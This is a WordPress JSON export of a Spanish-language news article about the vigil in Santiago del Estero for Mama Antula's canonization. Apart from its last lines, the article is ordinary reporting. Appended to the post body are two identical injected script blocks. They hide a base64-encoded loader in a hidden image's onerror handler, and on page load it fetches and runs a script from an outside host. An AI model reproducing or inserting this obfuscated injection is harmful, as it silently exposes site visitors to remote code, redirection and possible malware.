{"id":3674,"date":"2024-02-13T12:10:14","date_gmt":"2024-02-13T15:10:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3674"},"modified":"2025-08-14T00:00:48","modified_gmt":"2025-08-14T03:00:48","slug":"todo-santiago-del-estero-celebro-la-canonizacion-de-mama-antula","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3674","title":{"rendered":"Todo Santiago del Estero celebr\u00f3 la canonizaci\u00f3n de Mama Antula"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-45d07460955878a18abd729752cdbb1c\" style=\"background-color:#67696b\"><em>Con una vigilia que se extendi\u00f3 durante toda la madrugada, el santurario que se encuentra en la plaza Libertad de Santiago del Estero y en Sil\u00edpica alberg\u00f3 a miles de seguidores de la religiosa a trav\u00e9s de pantallas gigantes, c\u00e1nticos y aplausos para celebrar el nombramiento.<\/em><\/h4>\n\n\n\n<p>Cientos de fieles siguieron este&nbsp; desde la plaza Libertad de Santiago del Estero y en Sil\u00edpica, donde<strong><\/strong>se encuentra<strong>&nbsp;el santuario en honor a Mama Antula<\/strong>,<a href=\"https:\/\/www.telam.com.ar\/notas\/202402\/654922-francisco-canonizacion-mama-antula.html\" target=\"_blank\" rel=\"noreferrer noopener\">&nbsp;la canonizaci\u00f3n de la primera santa argentina&nbsp;<\/a>a trav\u00e9s de pantallas gigantes que transmitieron la ceremonia encabezada por el papa Francisco en el Vaticano.<\/p>\n\n\n\n<p>La emoci\u00f3n y la alegr\u00eda de tener una santa inund\u00f3 los corazones de los presentes, quienes con c\u00e1nticos y aplausos celebraron el momento en que la religiosa fue declarada santa.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-twitter wp-block-embed-twitter\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\"><p lang=\"es\" dir=\"ltr\">En Santiago del Estero, cientos de fieles siguieron la transmisi\u00f3n por pantallas gigantes de la ceremonia de canonizaci\u00f3n de Mama Antula, la primera santa argentina <a href=\"https:\/\/t.co\/QMRgTPi5O1\">https:\/\/t.co\/QMRgTPi5O1<\/a> <a href=\"https:\/\/t.co\/f2bgTGEeiB\">pic.twitter.com\/f2bgTGEeiB<\/a><\/p>&mdash; Agencia T\u00e9lam (@AgenciaTelam) <a href=\"https:\/\/twitter.com\/AgenciaTelam\/status\/1756664388398788760?ref_src=twsrc%5Etfw\">February 11, 2024<\/a><\/blockquote><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n<\/div><\/figure>\n\n\n\n<p>En un mensaje grabado,&nbsp;<strong>el obispo de la di\u00f3cesis de Santiago del Estero, Vicente Bokalic, celebr\u00f3 la canonizaci\u00f3n<\/strong>&nbsp;y remarc\u00f3 que en \u00abtiempos como decimos de grandes crisis, de oscuridades, de des\u00e1nimos, de tristezas, si miramos a Mama Antula vamos a descubrir que ella atraves\u00f3 todos estos momentos\u00bb.<\/p>\n\n\n\n<p>\u00ab\u00bfQu\u00e9 fue lo que la mantuvo firme en esa decisi\u00f3n? Su profundo amor a Jes\u00fas, Jes\u00fas le daba fuerzas, Jes\u00fas le daba la vida, Jes\u00fas le daba el amor, Jes\u00fas la impulsaba a la misi\u00f3n, por eso comenz\u00f3 a caminar y hoy la Iglesia Universal la reconoce como santa\u00bb, a\u00f1adi\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65c8923729da9_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Foto: Emilio Rapetti<\/figcaption><\/figure>\n\n\n\n<p>A la vez,<strong>&nbsp;el padre Carlos Rafael Navarro, quien arrib\u00f3 a la provincia desde Tucum\u00e1n para participar de la vigilia en la plaza Libertad<\/strong>, dijo en di\u00e1logo con los medios que Mama Antula fue una \u00abmujer que vivi\u00f3 la empat\u00eda y muchas caracter\u00edsticas que vamos descubriendo de esta santa que la historia la olvid\u00f3 un poco, pero que ahora, gracias al papa Francisco la sac\u00f3 de ese anonimato\u00bb.<\/p>\n\n\n\n<p>En ese marco, agreg\u00f3 que el pont\u00edfice este domingo la muestra<strong>&nbsp;\u00abcomo un modelo de vida para muchos j\u00f3venes y tambi\u00e9n para nuestra sociedad en estos tiempos que nos toca vivir\u00bb.<\/strong><\/p>\n\n\n\n<p>\u00abEs mujer de la esperanza, que nos trae esperanza en este tiempo que vemos mucho agobio, mucho cansancio, mucha violencia\u00bb, dijo.<\/p>\n\n\n\n<p><strong>Durante la vigilia<\/strong>&nbsp;tambi\u00e9n se dio a conocer un mensaje de Claudio Perusini, quien recibi\u00f3 el milagro por intercesi\u00f3n de Mama Antula, quien dijo: \u00abCuando me preguntan sobre el milagro, que yo no hice nada; que Dios, a trav\u00e9s de Mama Antula, sigue mostrando su amor en nuestra historia\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65c8923716aa5_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Foto: Emilio Rapetti<\/figcaption><\/figure>\n\n\n\n<p>\u00abAs\u00ed, con un coraz\u00f3n agradecido, pidamos por nuestra patria, por los hermanos que sufren, por la Iglesia, por el aumento de vocaciones sacerdotales, religiosas y laicales, y festejemos con inmensa alegr\u00eda la manifestaci\u00f3n de Dios en la santificaci\u00f3n de Mama Antula\u00bb, agreg\u00f3<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">A la espera de la canonizaci\u00f3n<\/h2>\n\n\n\n<p>La vigilia por la canonizaci\u00f3n de Mama Antula<strong>&nbsp;se inici\u00f3 pasadas las 23 y se extendi\u00f3 toda la madrugada&nbsp;<\/strong>con gran emoci\u00f3n en la plaza Libertad de la capital de Santiago del Estero, al son de zambas y chacareras, con c\u00e1nticos y aplausos.<\/p>\n\n\n\n<p>No s\u00f3lo de santiague\u00f1os se congregaron en un d\u00eda hist\u00f3rico para el pa\u00eds, por tratarse de la primera santa argentina, sino tambi\u00e9n con el acompa\u00f1amiento de fieles de Chaco, Tucum\u00e1n, Formosa, Santa Fe, Buenos Aires, C\u00f3rdoba y otras provincias.<\/p>\n\n\n\n<p><strong>El sacerdote Rafael Navarro, el \u00abpadre Rafa\u00bb<\/strong>, quien se har\u00e1 cargo del santuario de Huachana, fue uno de los primeros animadores que comenz\u00f3 a vivar a Mama Antula, con la entrada de las im\u00e1genes hist\u00f3ricas de la provincia Se\u00f1or de los Milagros de Mail\u00edn, la Virgen de Sumampa y la de Mama Antula.<\/p>\n\n\n\n<p>\u00abBendecinos, Mama Antula; que no nos falte el pan, bendice a los j\u00f3venes y a los ni\u00f1os\u00bb, indic\u00f3 a la entrada de las im\u00e1genes y el aplauso de los presentes.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65c89236f27df_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Foto: Emilio Rapetti<\/figcaption><\/figure>\n\n\n\n<p>Y remarc\u00f3 que todo esto \u00abes una invitaci\u00f3n que le digan s\u00ed a Jes\u00fas, al modo de vida de Mama Antula\u00bb.<\/p>\n\n\n\n<p>De esta manera<strong>&nbsp;se inici\u00f3 la vigilia, para luego dar paso a la entonaci\u00f3n del Himno Nacional, interpretado por la banda de m\u00fasica de la Polic\u00eda santiague\u00f1a.<\/strong><\/p>\n\n\n\n<p>\u00abElla fue una mujer valiente, una mujer fuerte, una laica que vivi\u00f3 el evangelio y por eso sentimos un gran orgullo que haya sido declarada santa por el Papa Francisco\u00bb, dijo a T\u00e9lam la hermana Betty, quien lleg\u00f3 junto a un grupo de diez personas desde Taco Pozo, Chaco.<\/p>\n\n\n\n<p><strong>Miriam Quelas, del movimiento santiague\u00f1o del C\u00edrculo de Juventud \u00abEslab\u00f3n\u00bb<\/strong>, dijo a T\u00e9lam que la canonizaci\u00f3n de Mama Antula \u00abcobra una gran significaci\u00f3n para todos nosotros que somos un grupo de j\u00f3venes que tomamos como ejemplo los retiros ignacianos de Mama Antula\u00bb.<\/p>\n\n\n\n<p>\u00abEl mensaje que nos da el Papa con esta canonizaci\u00f3n es que cualquier laico puede ser santo y Mama Antula era una mujer que llev\u00f3 a Cristo en su coraz\u00f3n\u00bb, a\u00f1adi\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65c892375284d_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Foto: Emilio Rapetti<\/figcaption><\/figure>\n\n\n\n<p>Antes del inicio de la actuaci\u00f3n de diferentes artistas, autoridades provinciales y municipales colocaron ofrendas florales en la imagen de Mama Antula, la cual&nbsp;<strong>seg\u00fan el gobernador Gerardo Zamora ser\u00e1 declarada tambi\u00e9n \u00abSanta Patrona de la Provincia\u00bb.<\/strong><\/p>\n\n\n\n<p>Zamora, quien viaj\u00f3 a Roma para participar de la ceremonia en el Vaticano, resalt\u00f3 en sus redes sociales que era una \u00abinmensa alegr\u00eda, poder entregar el proyecto de ley por el cual se declarar\u00e1 Santa Patrona de la Provincia a Mama Antula\u00bb al Papa.<\/p>\n\n\n\n<p>A la vez manifest\u00f3 que le expres\u00f3 a Su Santidad \u00abel deseo de todos los santiague\u00f1os que so\u00f1amos con la bendici\u00f3n de su presencia en nuestra tierra, en su pr\u00f3xima y esperada visita a Argentina\u00bb.<\/p>\n\n\n\n<p>Una de las primeras actuaciones fue del Coro Estable de la Provincia, dirigido por&nbsp;<strong>el profesor Roberto Peralta, que interpret\u00f3 la Misa Criolla, una obra reconocida a nivel internacional y que emocion\u00f3 a los fieles.<\/strong><\/p>\n\n\n\n<p>Luego subieron al escenario numerosos artistas y bailarines que honraron a Mama Antula hasta las cinco de la ma\u00f1ana, tales como fue el grupo Soles y Lunas, Luisa Galv\u00e1n, Salitral; Marcelo Toledo; Pablo Araujo; y la actuaci\u00f3n de Manolo Herrera y las Sachas Guitarras Atamisque\u00f1as.<\/p>\n\n\n\n<p><strong>Mar\u00eda Antonia de San Jos\u00e9, conocida en el mundo como Mama Antula<\/strong>, naci\u00f3 en Villa Sil\u00edpica, en el interior de la provincia de Santiago del Estero, en donde tambi\u00e9n se festej\u00f3 con m\u00fasica, agrupaciones gauchas y un gran fog\u00f3n comunitario.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202402\/654947-santiago-del-estero-canonizacion-mama-antula.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-664\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg 964w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-768x76.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con una vigilia que se extendi\u00f3 durante toda la madrugada, el santurario que se encuentra en la plaza Libertad de Santiago del Estero y en Sil\u00edpica alberg\u00f3 a miles de seguidores de la religiosa a trav\u00e9s de pantallas gigantes, c\u00e1nticos y aplausos para celebrar el nombramiento. Cientos de fieles siguieron este&nbsp; desde la plaza Libertad [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3675,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[2],"tags":[],"class_list":{"0":"post-3674","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-religiosos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3674"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3674"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3674\/revisions"}],"predecessor-version":[{"id":6855,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3674\/revisions\/6855"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3675"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3674"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3674"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3674"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}